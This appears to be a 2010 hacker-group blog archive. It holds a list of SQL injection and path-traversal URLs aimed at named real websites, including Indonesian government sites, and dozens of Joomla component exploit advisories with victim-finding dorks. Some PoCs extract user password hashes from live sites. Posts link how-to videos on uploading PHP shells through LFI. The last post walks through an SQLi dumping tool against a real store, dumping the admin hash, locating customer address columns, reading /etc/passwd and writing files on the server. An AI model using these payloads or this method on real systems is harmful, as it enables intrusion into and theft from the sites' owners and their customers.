http://insentif.ristek.go.id/download.php?file=../../../../../../../../../../../../../../../etc/passwd

http://dymarjaya.co.id/newsdetail.php?id=10+AND+1=2+UNION+ALL+SELECT+1,2,version()--

http://www.dataglobal.co.id/newsdetail.php?id=70+AND+1=2+UNION+ALL+SELECT+1,2,3,version(),5,database(),7,user()--

http://dwp.kbri-islamabad.go.id/main.php?page=../../../../../../../../../../../../../../../etc/passwd

http://www.earthhour.wwf.or.id/news_detail.php?id=155+AND+1=2+UNION+ALL+SELECT+1,version(),3,4,database()--

http://digilib.biologi.lipi.go.id/indexdisc.php?topic_id=29+AND+1=2+UNION+ALL+SELECT+1,2,3,4,version(),6,7,8,9,database(),user()--

http://www.lpmpjabar.go.id/otomilib/index.php?menu=../../../../../../../../../../../../../../../etc/passwd

http://www.acbi.co.id/articledetail.php?cat=&id=17+and+1=2+union+select+1,version(),database(),user(),5,6--

http://www.otorita-asahan.go.id/berita.php?id=56+AND+1=2+UNION+ALL+SELECT+version(),database(),3,4--

http://web.ptpn7.com/?lang=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf

http://www.kpbptpn.co.id/news.php?news_id=4720+AND+1=2+UNION+ALL+SELECT+1,2,version(),user(),database(),6,7,8,9,10,11,12,13--

http://lemlit.uny.ac.id/sipen/main/index.php?pageID=2&kode_proposal=3122+and+1=2+union+select+1,2,version(),database(),5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--

http://rehab.ditptksd.go.id/index.php?module=../../../../../../../../../../../../../../../etc/passwd

http://aslimotorgroup.co.id/berita-selengkapnya.php?id=31+AND+1=2+UNION+SELECT+1,version(),3,database(),user(),6--

blind sqli

http://www.dk.co.id/new/index.php?id=11+and+1=2+union+all+select+1,2,3--&page=Reseller%20Hosting

http://www.impulse.or.id/artikel.php?id=6

http://www.samudra.co.id/new/detail.php?det=34

SeberCart LFD Vuln [ readfile() ]

2010-05-13T19:59:00.002+07:00

[o] Joomla Component Seber Cart Local File Disclosure Vulnerability

Software : com_sebercart
Vendor : http://www.seber.com.au/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit

http://localhost/[path]/components/com_sebercart/getPic.php?p=../../configuration.php

Download image.jpg file and open it with notepad or gedit.
You will see joomla configuration there.

[o] PoC

http://www.rare-earth.com.au/components/com_sebercart/getPic.php?p=../../configuration.php

LFI Local Upload Form [video]

2010-04-22T23:40:00.004+07:00

another video tutorial by AntiSecurity Team
this video still using Tamper Data & /proc/self/environ
but this time we use upload form... :))

big thanks to Vrs-hCk a.k.a ander for the idea ^^

watch the video here
http://pacenoge.org/vid/upload_form.html

download here
http://pacenoge.org/vid/upload_form.swf

upload form script
http://pacenoge.org/tool/upload_form.txt

AntiSecurity Vulnerability Alert

2010-04-15T02:09:00.003+07:00

if you wanna see our new bug, you can see it here..

http://www.exploit-db.com/author/AntiSecurity

i'm too lazy to post here one by one.. :))

./NoGe

Joomla Component JA Job Board Multiple LFI Vuln

2010-04-11T14:18:00.001+07:00

[o] Joomla Component JA Job Board Multiple Local File Inclusion Vulnerability
Software : com_jajobboard version 1.4.4
Vendor : http://jobboard.joomlart.com/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_jajobboard&view=[LFI]
http://localhost/[path]/index.php?option=com_jajobboard&controller=[LFI]

[o] PoC
http://localhost/[path]/index.php?option=com_jajobboard&view=../../../../../../../../../../etc/passwd
http://localhost/[path]/index.php?option=com_jajobboard&controller=../../../../../../../../../../etc/passwd

[o] Dork
inru:"com_jajobboard"

Joomla Component Preventive And Reservation LFI Vuln

2010-04-11T14:16:00.001+07:00

[o] Joomla Component Preventive And Reservation Local File Inclusion Vulnerability
Software : com_preventive version 1.0.5
Vendor : http://www.joomla.ternaria.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_preventive&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_preventive"

Joomla Component Jfeedback! LFI Vuln

2010-04-11T14:14:00.000+07:00

[o] Joomla Component Jfeedback! Local File Inclusion Vulnerability
Software : com_jfeedback version 1.2
Vendor : http://www.joomla.ternaria.com/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_jfeedback&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_jfeedback"

Joomla Component JProject Manager LFI Vuln

2010-04-11T14:12:00.000+07:00

[o] Joomla Component JProject Manager Local File Inclusion Vulnerability
Software : com_jprojectmanager version 1.0
Vendor : http://www.joomla.ternaria.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_jprojectmanager&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_jprojectmanager"

Joomla Component RokModule Blind SQLi [moduleid] Vuln

2010-04-11T14:10:00.000+07:00

[o] Joomla Component RokModule Blind SQLi [moduleid] Vulnerability
Software : com_rokmodule version 1.1
Vendor : http://www.rockettheme.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=[BSQLi]

[o] PoC
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false

[o] Dork
"index.php?option=com_rokmodule" "moduleid"

Joomla Component AlphaUserPoints LFI Vuln

2010-04-11T14:08:00.001+07:00

[o] Joomla Component AlphaUserPoints Local File Inclusion Vulnerability
Software : com_alphauserpoints version 1.5.5
Vendor : http://www.alphaplug.com/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_alphauserpoints&view=[LFI]

[o] PoC
http://localhost/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_alphauserpoints"

Joomla Component TICKETbook LFI Vuln

2010-04-11T14:05:00.001+07:00

[o] Joomla Component Ticketbook Local File Inclusion Vulnerability
Software : com_ticketbook version 1.0.1
Vendor : http://www.demo-page.de/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_ticketbook&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_ticketbook&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_ticketbook"

Joomla Component TweetLA! LFI Vuln

2010-04-11T14:01:00.000+07:00

[o] Joomla Component TweetLA! Local File Inclusion Vulnerability
Software : com_tweetla version 1.0.1
Vendor : http://www.demo-page.de/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://[site]/[path]/index.php?option=com_tweetla&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd

[o] Dork
inurl:"com_tweetla"

Joomla Component TRAVELbook LFI Vuln

2010-04-11T13:59:00.004+07:00

[o] Joomla Component TRAVELbook Local File Inclusion Vulnerability
Software : com_travelbook version 1.0.1
Vendor : http://www.demo-page.de/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_travelbook&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_travelbook"

Joomla Component spsNewsletter LFI Vuln

2010-04-11T13:55:00.001+07:00

[o] Joomla Component spsNewsletter Local File Inclusion Vulnerability
Software : com_spsnewsletter
Vendor : http://www.modernbridge.com/spsNewsletter/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_spsnewsletter&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_spsnewsletter"

Joomla Component AWDwall-Joomla LFI & SQLi Vuln

2010-04-09T17:52:00.000+07:00

[o] Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability
Software : com_awdwall version 1.5.4
Vendor : http://www.awdsolution.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_awdwall&controller=[LFI]
http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=1[SQL]

[o] PoC
http://localhost/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd
http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12+from+jos_users--

[o] Dork
inurl:"com_awdwall"

Joomla Component Realtyna Translator LFI Vuln

2010-04-09T17:49:00.001+07:00

[o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability
Software : com_realtyna version 1.0.15
Vendor : http://software.realtyna.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_realtyna"

Joomla Component Webee Comments LFI Vuln

2010-04-09T17:42:00.002+07:00

[o] Joomla Component Webee Comments Local File Inclusion Vulnerability
Software : com_webeecomment version 2.0
Vendor : http://www.onnogroen.nl/webee/
Author : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_webeecomment&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_webeecomment&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_webeecomment"

Joomla Component News Portal LFI Vuln

2010-04-06T12:27:00.006+07:00

[o] Joomla Component News Portal Local File Inclusion Vulnerability
Software : com_news_portal version 1.5.x
Vendor : http://www.ijoomla.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_news_portal&controller=[LFI]

[o] PoC
http://www.fight4romania.com/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_news_portal"

Joomla Component Highslide JS LFI Vuln

2010-04-06T11:29:00.004+07:00

[o] Joomla Component Highslide JS Local File Inclusion Vulnerability
Software : com_hsconfig version 1.5
Vendor : http://www.joomlanook.com/
Author : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_hsconfig&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_hsconfig"

Joomla Component XOBBIX SQL Injection Vuln

2010-04-06T11:26:00.003+07:00

[o] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
Software : com_xobbix version 1.0.x
Vendor : http://www.php-shop-system.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25

[o] PoC
http://stutterandsing.com/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,database(),10,11,12,13,14,15,16+from+jos_users--

[o] Dork
inrul:"com_xobbix"

Joomla Component Appointment LFI Vuln

2010-04-06T11:24:00.003+07:00

[o] Joomla Component Appointment Local File Inclusion Vulnerability
Software : com_appointment version 1.5
Vendor : http://thebestmakers.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_appointment&controller=[LFI]

[o] PoC
http://localhost/index.php?option=com_appointment&controller=../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_appointment"

Joomla Component Affiliate Feeds LFI Vuln

2010-04-06T11:21:00.002+07:00

[o] Joomla Component Affiliate Feeds Local File Inclusion Vulnerability
Software : com_datafeeds version 880
Vendor : http://www.affiliatefeeds.nl/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_datafeeds&controller=[LFI]

[o] PoC
http://www.winm0ney.com/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_datafeeds"

Joomla Component Fabrik LFI Vuln

2010-04-06T11:18:00.003+07:00

[o] Joomla Component Fabrik Local File Inclusion Vulnerability
Software : com_fabrik version 2.0
Vendor : http://fabrikar.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_fabrik&controller=[LFI]

[o] PoC
http://awards.julib.com/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_fabrik"

Joomla Component J!WHMCS Integrator LFI Vuln

2010-04-06T11:13:00.004+07:00

[o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability
Software : com_jwhmcs version 1.5.0
Vendor : https://client.gohigheris.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_jwhmcs&controller=[LFI]

[o] PoC
http://www.websites.co.uk/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_jwhmcs"

Joomla Component Saber Cart LFI Vuln

2010-04-06T10:47:00.003+07:00

[o] Joomla Component Saber Cart Local File Inclusion Vulnerability
Software : com_sebercart version 1.0.0.12
Vendor : http://www.seber.com.au/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_sebercart&view=[LFI]

[o] PoC
http://www.zoochthepooch.com/index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_sebercart"

Joomla Component Juke Box LFI Vuln

2010-04-06T10:35:00.004+07:00

[o] Joomla Component Juke Box Local File Inclusion Vulnerability
Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]

[o] PoC
http://www.livequrantutors.com/app/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_jukebox"

Joomla Component Joomla Flickr LFI Vuln

2010-04-06T10:25:00.005+07:00

[o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability
Software : com_joomlaflickr version 1.0.x
Vendor : http://aloiroberto.wordpress.com/software/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_joomlaflickr&controller=[LFI]

[o] PoC
http://www.theknokkies.nl/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_joomlaflickr"

Joomla Component redSHOP LFI Vuln

2010-04-04T21:05:00.003+07:00

[o] Joomla Component redSHOP Local File Inclusion Vulnerability
Software : com_redshop version 1.0.x [ commercial ]
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Exploit
http://localhost/[path]/index.php?option=com_redshop&view=[LFI]

[o] PoC
http://bollanova.com/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_redshop"

Joomla Component redTWITTER LFI Vuln

2010-04-04T21:02:00.004+07:00

[o] Joomla Component redTWITTER Local File Inclusion Vulnerability
Software : com_redtwitter version 1.0.x
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Exploit
http://localhost/[path]/index.php?option=com_redtwitter&view=[LFI]

[o] PoC
http://www.measham.org.uk/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_redtwitter"

Joomla Component WISro Yahoo Quotes LFI Vuln

2010-04-04T20:56:00.004+07:00

[o] Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability
Software : com_wisroyq version 1.1.x [ commercial ]
Vendor : http://www.wis.ro/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Exploit
http://localhost/[path]/index.php?option=com_wisroyq&controller=[LFI]

[o] PoC
http://www.baird.co.uk/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
"Powered by WISro Yahoo Quotes"

[o] Solution
Upgrade to a higher version

SimpNews Multiple SQL Injection Vuln

2010-04-01T12:27:00.005+07:00

[o] SimpNews Multiple SQL Injection Vulnerabilities
Software : SimpNews version 2.16.2 and below
Vendor : http://www.boesch-it.de/
Download : http://www.boesch-it.de/sw/php-scripts/simpnews/english/download.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
news.php
master.php
announceprint.php

[o] Exploit
http://localhost/[path]/news.php?category=[sql]
http://localhost/[path]/master.php?newsnr=[sql]
http://localhost/[path]/announceprint.php?announcenr=[sql]

[o] PoC
http://www.asff-badminton.com/news/news.php?category=2+AND+1=2+UNION+ALL+SELECT+1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+simpnews_users--
http://www.wecsrl.it/formazione/master.php?newsnr=-999+UNION+SELECT+0,0,0,password,username,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+simpnews_users+WHERE+usernr=1--
http://www.schaefer-tobies.de/simpnews/announceprint.php?announcenr=1+AND+1=2+UNION+ALL+SELECT+1,2,3,4,GROUP_CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+FROM+simpnews_users--

Local File Inclusion [LFI] to Remote Command Execution [RCE]

2010-03-30T10:50:00.005+07:00

this video shows how to make Local File Inclusion vuln became Remote Command Execution
upload and execute command via phpshell

tool [irc bot scan]
http://pacenoge.org/tool/vopscan5.1.zip

download video
http://pacenoge.org/tool/lfi2rce.swf

watch the video
http://pacenoge.org/tool/lfi2rce.html

Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va matthews Angela Zhang stardustmemory

Upload phpshell via LFI vuln

2010-03-26T22:25:00.005+07:00


using com_ckforms LFI vuln
http://www.exploit-db.com/exploits/11785


tool
mozilla addons >> tamper data


download video
http://pacenoge.org/tool/lfi.swf


watch the video
http://pacenoge.org/tool/lfi.html


Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va matthews Angela Zhang stardustmemory

Simple SQLi Dumper v5.1 [ How To ]

2010-03-22T03:34:00.005+07:00

[o] attention

USE THIS TOOL FOR EDUCATION PURPOSE ONLY.
WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!

SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )
SSDp How To by NoGe ( mario[at]antisecurity[dot]org )

[o] what is SSDp?

SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

[o] download SSDp v5.1

http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz

[o] function

- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column

[o] command and option

[root@evilc0de noge]# perl ssdp.pl -h

|-----------------------------------------------------------------------------|
| Usage: perl ssdp.pl [options] |
| |
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: "--") |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: "+") |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
| |
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
| |
| -log [file name] file name to save ssdp data (default: ssdp.log) |
| -p [http proxy] hostname:port |
|-----------------------------------------------------------------------------|

[o] proof of concept

[0x01] magic number (null column).

first of all we have to find null column (magic number).
null column used for execute our SQL query.

# perl ssdp.pl -u [target URL] -magic

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: --

Attempting to find the magic number...

[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

Showing MySQL Information ...

[+] Database: 460store
[+] User: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": Yes (w00t)
[+] Create File "/tmp/c0li-430.txt": Yes (w00t)

Done.

our magic number is 1 and it will replace with "c0li" string.
we can see the database information and operation system too.

[0x02] finding table

now we use URL that include "c0li" string on it to find table & column.

# perl ssdp.pl -u [c0li URL] -table

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 18

Showing tables ...

[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)

Done.

that is the list of all table in database()

[0x03] finding column

let's see column from table called "security".

# perl ssdp.pl -u [c0li URL] -t [table] -column

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5

Showing columns from table "security" ...

[+] security(1): user_id,username,password,admin,last_login

Done.

aha! we got column called "username" and "password".

[0x04] dumping data

now we'll see information inside that column.. :)

# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --

[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data ...

[1] admin : 2ec20101734c754d

Done.

we got admin username and password hash. :D
ok i have show you how to find magic number, table, column and dump data the column using SSDp.

[0x05] search column name (-find)

now i'll show you how to use -find option (Search Columns Name)
i'll try to search column with keyword "address" it require -c option (column)

# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: 460store
[+] Column Name string to search: address

Searching for Columns Path ...

[+] Columns Found:

[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name

Done.

found column with word "address" on table "customer". easy right? :p

[0x06] read & create file (read only)

now let's see Read File (read only) & Create File (read only).
why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(
as you can see at the first time we find magic number you'll find this line.

[+] Read File "/etc/passwd" : Yes (w00t)
[+] Create File "/tmp/c0li-159.txt" : Yes (w00t)

it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.
to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

the result will be like this.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh

let's create some file in /tmp directory. :)

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,"Simple SQLi Dumper",8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+"/tmp/ssdp.txt"--

